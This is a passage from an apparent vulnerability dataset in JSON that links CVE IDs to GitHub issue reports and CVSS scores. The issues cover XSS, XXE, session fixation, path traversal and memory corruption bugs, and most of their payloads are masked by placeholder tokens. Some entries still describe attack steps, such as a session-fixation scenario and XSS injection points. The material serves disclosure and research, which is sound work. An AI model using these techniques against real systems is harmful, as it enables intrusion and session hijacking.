  88109. "description": "API should support SSL by default. We've run into a few issues where developers do not perform their due diligence and assume MENTIONTAG still supports http by default. This isn't the case and hasn't been for quite some time. I realize there are cases where NUMBERTAG rd party Airbrake compatible backends ( APITAG might support HTTP by default. However, from a security and perception standpoint the reverse should be true: HTTPS by default. I would like to suggest the following updates Change default hosts URLTAG Change default protocol URLTAG Update context to errors section in README URLTAG Update API docs in README URLTAG MENTIONTAG As the maintainer I'm curious what your thoughts are on these changes? I can submit a PR if you'd prefer to discuss these changes that way. /cc MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG APITAG",
  88110. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  88111. "severity": "MEDIUM",
  88112. "baseScore": 5.9,
  88113. "impactScore": 3.6,
  88114. "exploitabilityScore": 2.2
  88115. },
  88116. {
  88117. "CVE_ID": "CVE-2016-1516",
  88118. "Issue_Url_old": "https://github.com/opencv/opencv/issues/5956",
  88119. "Issue_Url_new": "https://github.com/opencv/opencv/issues/5956",
  88120. "Repo_new": "opencv/opencv",
  88121. "Issue_Created_At": "2016-01-13T00:18:16Z",
  88122. "description": "Remote code execution via heap corruption. We've isolated a couple bugs that could allow an attacker to achieve remote code execution on a victim's machine when processing an infected image with APITAG We have more details and would like to responsibly disclose this to a lead developer. Known vulnerable versions: Linux, APITAG NUMBERTAG Unverified but most likely works on all versions.",
  88123. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88124. "severity": "HIGH",
  88125. "baseScore": 8.8,
  88126. "impactScore": 5.9,
  88127. "exploitabilityScore": 2.8
  88128. },
  88129. {
  88130. "CVE_ID": "CVE-2016-4069",
  88131. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/4957",
  88132. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/4957",
  88133. "Repo_new": "roundcube/roundcubemail",
  88134. "Issue_Created_At": "2016-01-16T16:36:53Z",
  88135. "description": "Protect attachment downloads against CSRF. APITAG by MENTIONTAG on NUMBERTAG Jan NUMBERTAG UTC as Trac ticket NUMBERTAG Message attachments are downloaded via GET requests (with APITAG ) and therefore can be triggered by a NUMBERTAG rd party site with guessed URLs and an active session in the victims browser. While this doesn't disclose any data to the attacker site, it triggers unwanted file downloads and puts load on the server as well as fills the victims disk if executed repeatedly. We already have CSRF protection means with session based request tokens. Requiring such tokens on download urls would add the necessary protection against these unwanted downloads. APITAG From: URLTAG",
  88136. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88137. "severity": "HIGH",
  88138. "baseScore": 8.8,
  88139. "impactScore": 5.9,
  88140. "exploitabilityScore": 2.8
  88141. },
  88142. {
  88143. "CVE_ID": "CVE-2016-9435",
  88144. "Issue_Url_old": "https://github.com/tats/w3m/issues/16",
  88145. "Issue_Url_new": "https://github.com/tats/w3m/issues/16",
  88146. "Repo_new": "tats/w3m",
  88147. "Issue_Created_At": "2016-08-17T09:09:22Z",
  88148. "description": "valgrind found many issues about uninitialised value. There are many noise in libgc. I don't know they are valid or not, so just disable GC by GC_DONT_GC NUMBERTAG and ignore memory leak for now. Minimal test case: ERRORTAG There is different issue for APITAG ERRORTAG If feeding w3m more complex input, there are more. For example, ERRORTAG",
  88149. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88150. "severity": "MEDIUM",
  88151. "baseScore": 6.5,
  88152. "impactScore": 3.6,
  88153. "exploitabilityScore": 2.8
  88154. },
  88155. {
  88156. "CVE_ID": "CVE-2017-14040",
  88157. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/995",
  88158. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/995",
  88159. "Repo_new": "uclouvain/openjpeg",
  88160. "Issue_Created_At": "2017-08-17T08:59:55Z",
  88161. "description": "invalid memory write in tgatoimage (convert.c). On master: ERRORTAG Testcase: URLTAG",
  88162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88163. "severity": "HIGH",
  88164. "baseScore": 8.8,
  88165. "impactScore": 5.9,
  88166. "exploitabilityScore": 2.8
  88167. },
  88168. {
  88169. "CVE_ID": "CVE-2017-16956",
  88170. "Issue_Url_old": "https://github.com/b3log/symphony/issues/509",
  88171. "Issue_Url_new": "https://github.com/b3log/symphony/issues/509",
  88172. "Repo_new": "b3log/symphony",
  88173. "Issue_Created_At": "2017-11-23T16:12:02Z",
  88174. "description": "Article exists XSS vulnerability. Hi,man.We meet again. Get to the APITAG problem appears in the article. My test environment symphony version : latest OS : APITAG NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG PM Vulnerability details Location : /article/ send private letter to anyone : APITAG I changed the value of this letter's title to xss payload APITAG and then send it. You must send two private APITAG will trigger vulnerability. Open one of the letters APITAG : APITAG Attack When person open the link, I can get their cookies. HTML code : APITAG APITAG Vulnerability Reporter : vulkey(mstsec)",
  88175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88176. "severity": "MEDIUM",
  88177. "baseScore": 6.1,
  88178. "impactScore": 2.7,
  88179. "exploitabilityScore": 2.8
  88180. },
  88181. {
  88182. "CVE_ID": "CVE-2017-17514",
  88183. "Issue_Url_old": "https://github.com/jcupitt/nip2/issues/70",
  88184. "Issue_Url_new": "https://github.com/libvips/nip2/issues/70",
  88185. "Repo_new": "libvips/nip2",
  88186. "Issue_Created_At": "2017-12-15T08:48:31Z",
  88187. "description": "CVETAG : shell argument injection via crafted URL. Hi John, CVETAG CVETAG showed up today: > boxes.c in nip NUMBERTAG does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument injection attacks via a crafted URL. Except for the Debian security tracker page URLTAG , I can find no information about it, so I'm guessing you weren't informed either NUMBERTAG is apparently the last version packaged by Debian, but later nip2 releases also carry the same code. In case it's useful, there's a form for submitting FILETAG to CVE records.",
  88188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88189. "severity": "HIGH",
  88190. "baseScore": 8.8,
  88191. "impactScore": 5.9,
  88192. "exploitabilityScore": 2.8
  88193. },
  88194. {
  88195. "CVE_ID": "CVE-2017-2809",
  88196. "Issue_Url_old": "https://github.com/tomoh1r/ansible-vault/issues/4",
  88197. "Issue_Url_new": "https://github.com/tomoh1r/ansible-vault/issues/4",
  88198. "Repo_new": "tomoh1r/ansible-vault",
  88199. "Issue_Created_At": "2017-05-09T15:27:43Z",
  88200. "description": "Security issue. Please provide contact/information on reporting security issues for Ansible vault",
  88201. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88202. "severity": "HIGH",
  88203. "baseScore": 7.8,
  88204. "impactScore": 5.9,
  88205. "exploitabilityScore": 1.8
  88206. },
  88207. {
  88208. "CVE_ID": "CVE-2017-5835",
  88209. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/88",
  88210. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/88",
  88211. "Repo_new": "libimobiledevice/libplist",
  88212. "Issue_Created_At": "2017-01-18T02:08:26Z",
  88213. "description": "memory allocation error. there is a extra large memery allocation error which can be detected by addresssanitizer NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG Cannot allocate memory NUMBERTAG b NUMBERTAG a NUMBERTAG b2 ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG dc ( PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d2ed ( PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG a1c4 in main PATHTAG NUMBERTAG b5fe3a NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG ) the source code around here are: APITAG = (uint NUMBERTAG t )malloc(sizeof(uint NUMBERTAG t) num_objects); the num_objects equals to a very large number. FILETAG",
  88214. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88215. "severity": "HIGH",
  88216. "baseScore": 7.5,
  88217. "impactScore": 3.6,
  88218. "exploitabilityScore": 3.9
  88219. },
  88220. {
  88221. "CVE_ID": "CVE-2017-6490",
  88222. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/167",
  88223. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/167",
  88224. "Repo_new": "Telaxus/EPESI",
  88225. "Issue_Created_At": "2017-03-02T18:19:01Z",
  88226. "description": "EPESI \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: EPESI Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cEPESI NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc: Multiple POST parameters : cid, value, element, mode, tab, form_name, id Value : > APITAG alert NUMBERTAG APITAG APITAG Want to back this issue? Post a bounty on it! URLTAG We accept bounties via Bountysource URLTAG . APITAG",
  88227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88228. "severity": "MEDIUM",
  88229. "baseScore": 6.1,
  88230. "impactScore": 2.7,
  88231. "exploitabilityScore": 2.8
  88232. },
  88233. {
  88234. "CVE_ID": "CVE-2017-8288",
  88235. "Issue_Url_old": "https://github.com/EasyScreenCast/EasyScreenCast/issues/46",
  88236. "Issue_Url_new": "https://github.com/easyscreencast/easyscreencast/issues/46",
  88237. "Repo_new": "easyscreencast/easyscreencast",
  88238. "Issue_Created_At": "2015-10-12T12:03:44Z",
  88239. "description": "Locking Screen sometimes dock and window list will remain in view. Sometimes when I lock the screen, the dock and window list will be in view. I am running Gnome NUMBERTAG on EL NUMBERTAG Beta with APITAG NUMBERTAG gnome shell NUMBERTAG Gjs WARNING : JS ERROR: Exception in callback for signal: updated: Error: Type name APITAG is already registered PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG",
  88240. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88241. "severity": "HIGH",
  88242. "baseScore": 8.1,
  88243. "impactScore": 5.9,
  88244. "exploitabilityScore": 2.2
  88245. },
  88246. {
  88247. "CVE_ID": "CVE-2017-9614",
  88248. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/167",
  88249. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/167",
  88250. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  88251. "Issue_Created_At": "2017-08-12T15:53:56Z",
  88252. "description": "CVETAG . The follow was crash reported on the full disclosure mailing list (It also includes a APITAG and was assigned CVETAG URLTAG",
  88253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88254. "severity": "HIGH",
  88255. "baseScore": 8.8,
  88256. "impactScore": 5.9,
  88257. "exploitabilityScore": 2.8
  88258. },
  88259. {
  88260. "CVE_ID": "CVE-2018-1000215",
  88261. "Issue_Url_old": "https://github.com/DaveGamble/cJSON/issues/267",
  88262. "Issue_Url_new": "https://github.com/davegamble/cjson/issues/267",
  88263. "Repo_new": "davegamble/cjson",
  88264. "Issue_Created_At": "2018-05-21T09:21:27Z",
  88265. "description": "Memory leak here I think. cJSON.C Line NUMBERTAG If hooks >reallocate failed and set 'buffer >buffer' to NULL without free.",
  88266. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  88267. "severity": "HIGH",
  88268. "baseScore": 7.5,
  88269. "impactScore": 3.6,
  88270. "exploitabilityScore": 3.9
  88271. },
  88272. {
  88273. "CVE_ID": "CVE-2018-1000519",
  88274. "Issue_Url_old": "https://github.com/aio-libs/aiohttp-session/issues/272",
  88275. "Issue_Url_new": "https://github.com/aio-libs/aiohttp-session/issues/272",
  88276. "Repo_new": "aio-libs/aiohttp-session",
  88277. "Issue_Created_At": "2018-04-30T08:22:10Z",
  88278. "description": "Session Fixation vulnerability in APITAG There is a window of opportunity for Session Fixation URLTAG exploitation in the logic of APITAG As seen here: URLTAG Get session data returns an empty dictionary for an empty (this includes invalidated) session. Referring here: URLTAG save_session takes this data and saves it in Redis. As a result, an invalidated session will result to the session ID being present in Redis with an empty mapping as its value. Now looking over at: URLTAG APITAG load_session only looks at the case where data (returned by reading from Redis) is None. This will happen only if the key (session ID) is not present in Redis (has either expired or was never inserted) but as we established above the key is never actually removed, just the value mapping emptied. As a result the load_session function will return a session with the presented session ID and not a new one, although there was no valid session in storage for this ID. If this is not caught and mitigated by the web app the following scenario can unfold: Attacker acquires a valid cookie Invalidates it (logs out) Attacker injects said cookie in victim's browser (see OWASP's link above for examples on how) Victim visits web app presenting the cookie present in his browser Web app uses the get_session to get a session object for the user, expecting a 'clean' session get_session returns a session with the session ID that was present in the cookie presented by the user session is populated by the web app and subsequently stored by aiohttp session during the response User is now logged in with the session ID of the cookie that was injected by the attacker The attacker now controls (knows) a session cookie for a given user",
  88279. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  88280. "severity": "MEDIUM",
  88281. "baseScore": 6.5,
  88282. "impactScore": 3.6,
  88283. "exploitabilityScore": 2.8
  88284. },
  88285. {
  88286. "CVE_ID": "CVE-2018-1000521",
  88287. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/328",
  88288. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/328",
  88289. "Repo_new": "bigtreecms/bigtree-cms",
  88290. "Issue_Created_At": "2018-02-23T16:59:59Z",
  88291. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG The low privileged(administrator) users can use this vulnerability to attack high APITAG users. For example\uff0cthere are two users: ]( URLTAG The low privileged(administrator) users can add user and set the email value to \u201c APITAG \u201d ![ URLTAG CODETAG When the high APITAG user view users\uff0che will be xssed: ]( URLTAG ![ URLTAG Thank you! email: EMAILTAG",
  88292. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88293. "severity": "MEDIUM",
  88294. "baseScore": 6.1,
  88295. "impactScore": 2.7,
  88296. "exploitabilityScore": 2.8
  88297. },
  88298. {
  88299. "CVE_ID": "CVE-2018-1000548",
  88300. "Issue_Url_old": "https://github.com/umlet/umlet/issues/500",
  88301. "Issue_Url_new": "https://github.com/umlet/umlet/issues/500",
  88302. "Repo_new": "umlet/umlet",
  88303. "Issue_Created_At": "2018-04-04T11:17:05Z",
  88304. "description": "XXE Security Vulnerability within Umlet Open File Function. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The line of code given below create an XML parser for parsing an XML file (or a uxf file) opened and parses the data within: URLTAG This parsing is done in an insecure manner and does not prohibit the usage of XML external entities. This allows attackers to do the above mentioned attacks on a targeted user. Attack Scenario An attacker could be sharing a diagram made within the Umlet software and exported as a uxf file. An example could be sharing a class diagram with a peer and exploiting that trusted relationship to perform unauthorised actions within their system (or even just downloading a class diagram online). APITAG File File named test.uxf APITAG",
  88305. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88306. "severity": "HIGH",
  88307. "baseScore": 7.8,
  88308. "impactScore": 5.9,
  88309. "exploitabilityScore": 1.8
  88310. },
  88311. {
  88312. "CVE_ID": "CVE-2018-1000632",
  88313. "Issue_Url_old": "https://github.com/dom4j/dom4j/issues/48",
  88314. "Issue_Url_new": "https://github.com/dom4j/dom4j/issues/48",
  88315. "Repo_new": "dom4j/dom4j",
  88316. "Issue_Created_At": "2018-07-01T09:25:35Z",
  88317. "description": "Validate APITAG inputs. APITAG doesn't validate inputs, so it is possible to create APITAG for example with '<' in the tag name. The bug was reported by MENTIONTAG thanks!",
  88318. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  88319. "severity": "HIGH",
  88320. "baseScore": 7.5,
  88321. "impactScore": 3.6,
  88322. "exploitabilityScore": 3.9
  88323. },
  88324. {
  88325. "CVE_ID": "CVE-2018-1000651",
  88326. "Issue_Url_old": "https://github.com/gchq/stroom/issues/813",
  88327. "Issue_Url_new": "https://github.com/gchq/stroom/issues/813",
  88328. "Repo_new": "gchq/stroom",
  88329. "Issue_Created_At": "2018-07-23T12:28:20Z",
  88330. "description": "XXE in XML Parser. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippet displays the usage of APITAG without disabling entities: URLTAG",
  88331. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  88332. "severity": "CRITICAL",
  88333. "baseScore": 10.0,
  88334. "impactScore": 6.0,
  88335. "exploitabilityScore": 3.9
  88336. },
  88337. {
  88338. "CVE_ID": "CVE-2018-1000820",
  88339. "Issue_Url_old": "https://github.com/neo4j-contrib/neo4j-apoc-procedures/issues/931",
  88340. "Issue_Url_new": "https://github.com/neo4j-contrib/neo4j-apoc-procedures/issues/931",
  88341. "Repo_new": "neo4j-contrib/neo4j-apoc-procedures",
  88342. "Issue_Created_At": "2018-09-29T09:24:23Z",
  88343. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
  88344. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  88345. "severity": "CRITICAL",
  88346. "baseScore": 10.0,
  88347. "impactScore": 6.0,
  88348. "exploitabilityScore": 3.9
  88349. },
  88350. {
  88351. "CVE_ID": "CVE-2018-1000872",
  88352. "Issue_Url_old": "https://github.com/OpenKMIP/PyKMIP/issues/430",
  88353. "Issue_Url_new": "https://github.com/openkmip/pykmip/issues/430",
  88354. "Repo_new": "openkmip/pykmip",
  88355. "Issue_Created_At": "2018-04-24T13:22:29Z",
  88356. "description": "No socket timeout may lead to denial of service. The server socket does not have a socket timeout defined. It is possible for a rogue connection to cause the server to be permanently stuck in the SSL handshake. To repro: Start server APITAG to establish a connection without completing the SSL handshake All future connections will be blocked Adding a defaulttimeout seems to fix this. CODETAG Log: ERRORTAG",
  88357. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88358. "severity": "MEDIUM",
  88359. "baseScore": 6.5,
  88360. "impactScore": 3.6,
  88361. "exploitabilityScore": 2.8
  88362. },
  88363. {
  88364. "CVE_ID": "CVE-2018-1002100",
  88365. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/61297",
  88366. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/61297",
  88367. "Repo_new": "kubernetes/kubernetes",
  88368. "Issue_Created_At": "2018-03-16T19:24:46Z",
  88369. "description": "Kubectl copy doesn't check for paths outside of it's destination directory.. Is this a BUG REPORT or FEATURE REQUEST? : Bug /kind bug What happened : kubectl cp PATHTAG PATHTAG If the container returns a malformed tarfile with paths like: PATHTAG kubectl writes this to APITAG instead of APITAG What you expected to happen : I expect kubectl to clean up the path and write to APITAG Notes Original credit to MENTIONTAG APITAG Hanselmann) for originally reporting the bug.",
  88370. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  88371. "severity": "MEDIUM",
  88372. "baseScore": 5.5,
  88373. "impactScore": 3.6,
  88374. "exploitabilityScore": 1.8
  88375. },
  88376. {
  88377. "CVE_ID": "CVE-2018-10186",
  88378. "Issue_Url_old": "https://github.com/radare/radare2/issues/9915",
  88379. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9915",
  88380. "Repo_new": "radareorg/radare2",
  88381. "Issue_Created_At": "2018-04-17T15:20:06Z",
  88382. "description": "heap buffer overflow in r_hex_bin2str ( PATHTAG ). This issue looks different from issue NUMBERTAG which is a stack based overflow and has been patched. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | dex | Architecture/bits of the file (mandatory) | ARM, Dalvik dex file version NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Successful processing of dex format Actual behavior heap buffer overflow Steps to reproduce the behavior download the attached POC checkout commit APITAG build with ASAN: ASAN='address' FILETAG run: radare2 A $POC Vulnerable code // PATHTAG NUMBERTAG R_API int r_hex_bin2str(const ut8 in, int len, char out NUMBERTAG int i, id NUMBERTAG char tmp FILETAG",
  88383. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88384. "severity": "MEDIUM",
  88385. "baseScore": 5.5,
  88386. "impactScore": 3.6,
  88387. "exploitabilityScore": 1.8
  88388. },
  88389. {
  88390. "CVE_ID": "CVE-2018-10550",
  88391. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4454",
  88392. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4454",
  88393. "Repo_new": "octopusdeploy/issues",
  88394. "Issue_Created_At": "2018-04-06T03:18:59Z",
  88395. "description": "User from tenant scoped team can see machines that do not scope to the tenant. Ticket: URLTAG Why Currently there is no restriction on machines that based on the scoped tenants, the restriction only apply on scoped environments What can we do? Apply the restrictions to machines based on scoped tenant. Check the filter logic in this class APITAG The complication Deployment target tenant setting can be ERRORTAG , ERRORTAG and Tenanted Tenant scoped users should not be able to see untenanted machines Tenant scoped users should not be able to see machine that does not scoped to the tenant Untenanted users should not be able to see tenanted only machines Should be more to add, let's have this one to start with Maybe it is not that bad Did a test that user scoped to NUMBERTAG tenant APITAG Project connected to tenants APITAG , APITAG and APITAG Deployment can only be made to APITAG Thought that user can see all other machines that from other tenants, as the user can only deployed to the scoped tenant, it is not that bad, it is more like a UI bug",
  88396. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  88397. "severity": "HIGH",
  88398. "baseScore": 7.5,
  88399. "impactScore": 3.6,
  88400. "exploitabilityScore": 3.9
  88401. },
  88402. {
  88403. "CVE_ID": "CVE-2018-11226",
  88404. "Issue_Url_old": "https://github.com/libming/libming/issues/144",
  88405. "Issue_Url_new": "https://github.com/libming/libming/issues/144",
  88406. "Repo_new": "libming/libming",
  88407. "Issue_Created_At": "2018-05-16T21:22:41Z",
  88408. "description": "buffer overflow in APITAG in APITAG URLTAG URLTAG Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG f NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG a in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG ea in __libc_message (do_abort=do_abort APITAG fmt=fmt APITAG \" %s : %s terminated \") at PATHTAG NUMBERTAG ffff NUMBERTAG c in __GI___fortify_fail (msg=<optimized out>, msg APITAG \"buffer overflow detected\") at APITAG NUMBERTAG ffff NUMBERTAG in __GI___chk_fail () at APITAG NUMBERTAG ffff NUMBERTAG c9 in _IO_str_chk_overflow (fp=<optimized out>, c=<optimized out>) at APITAG NUMBERTAG ffff NUMBERTAG b0 in __GI__IO_default_xsputn (f NUMBERTAG fffffffddb0, data=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in _IO_vfprintf_internal (s=s APITAG format=<optimized out>, format APITAG \"%ld\", ap=ap APITAG at APITAG NUMBERTAG ffff NUMBERTAG in ___vsprintf_chk (s NUMBERTAG b NUMBERTAG flags NUMBERTAG slen NUMBERTAG format NUMBERTAG af \"%ld\", APITAG at APITAG NUMBERTAG ffff NUMBERTAG ad in ___sprintf_chk (s=s APITAG NUMBERTAG flags=flags APITAG slen=slen APITAG format=format APITAG \"%ld\") at APITAG NUMBERTAG e NUMBERTAG in sprintf (__fmt NUMBERTAG af \"%ld\", __s NUMBERTAG b NUMBERTAG at PATHTAG NUMBERTAG APITAG (act=act APITAG at APITAG NUMBERTAG bb in APITAG (act=act APITAG at APITAG NUMBERTAG e9e9 in APITAG APITAG maxn NUMBERTAG actions NUMBERTAG a6e NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG bc9b in APITAG (n NUMBERTAG actions NUMBERTAG a6e NUMBERTAG maxn NUMBERTAG at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG a6ce0) at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG c NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG c5f0) at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG e0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Breakpoint NUMBERTAG APITAG (act=act APITAG at APITAG NUMBERTAG t=malloc NUMBERTAG bit decimal / (gdb) l NUMBERTAG t = malloc(needed_length NUMBERTAG sprintf(t, \"%g\", act APITAG NUMBERTAG return t NUMBERTAG case PUSH_INT: / INTEGER NUMBERTAG t=malloc NUMBERTAG bit decimal NUMBERTAG sprintf(t,\"%ld\", act APITAG NUMBERTAG return t NUMBERTAG case PUSH_CONSTANT: / CONSTANT NUMBERTAG if (act APITAG > poolcounter) (gdb) n NUMBERTAG sprintf(t,\"%ld\", act APITAG ); (gdb) n NUMBERTAG t=malloc NUMBERTAG bit decimal / (gdb) n NUMBERTAG sprintf(t,\"%ld\", act APITAG ); (gdb) n buffer overflow detected : PATHTAG terminated",
  88409. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88410. "severity": "HIGH",
  88411. "baseScore": 8.8,
  88412. "impactScore": 5.9,
  88413. "exploitabilityScore": 2.8
  88414. },
  88415. {
  88416. "CVE_ID": "CVE-2018-11227",
  88417. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/438",
  88418. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/438",
  88419. "Repo_new": "monstra-cms/monstra",
  88420. "Issue_Created_At": "2018-05-17T00:21:08Z",
  88421. "description": "Monstra XSS Vulnerability MENTIONTAG Hello team :) I found xss at index page I reported to the cve platform, they let me use CVETAG , you can contact them for details Request GET PATHTAG NUMBERTAG a NUMBERTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: tr TR,tr; APITAG US; APITAG Accept Encoding: gzip, deflate DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Response APITAG APITAG APITAG new APITAG APITAG })( PATHTAG ); _mga('create', '', 'auto'); _mga('send', 'pageview', { 'page': ' URLTAG 'title': '' }); APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG jiznp\" /> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG <img id='cryptogram'",
